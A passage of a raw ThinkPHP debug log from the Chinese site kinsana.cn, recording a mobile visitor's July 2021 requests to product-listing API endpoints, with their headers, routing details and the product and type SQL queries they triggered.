] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:29:23+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,770.78kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '4', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:49+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,696.34kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:49+08:00 ] 61.158.208.168 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,387.38kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:52+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,716.02kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 5 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:29:58+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,708.18kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '6', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 6 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:12+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,755.31kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '7', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 7 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:26+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,730.21kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '8', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 8 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:34+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,770.73kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '20', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '10', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 10 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:38+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,691.20kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/zycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '2', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:39+08:00 ] 61.158.208.168 POST /api/index/zypro [ info ] www.kinsana.cn/api/index/zypro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,875.47kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'zypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/zycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/zypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->zypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 2 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:52+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,694.88kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1,2,3,7,5,10) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:31:52+08:00 ] 61.158.208.168 POST /api/index/cwypro [ info ] www.kinsana.cn/api/index/cwypro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,715.13kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'cwypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/cwypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->cwypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:32:02+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,697.30kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '3', 'type_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 AND `type_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:32:06+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,703.88kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '3', 'type_id' => '2', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 AND `type_id` = 2 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:32:51+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,700.99kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '3', 'type_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 AND `type_id` = 3 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:32:58+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,698.05kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/cwycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '3', 'type_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 3 AND `type_id` = 5 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:33:02+08:00 ] 61.158.208.168 POST /api/index/jqpro [ info ] www.kinsana.cn/api/index/jqpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,796.39kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'jqpro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/jqycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/jqpro' => '', ) [ info ] [ RUN ] app\api\controller\Index->jqpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM 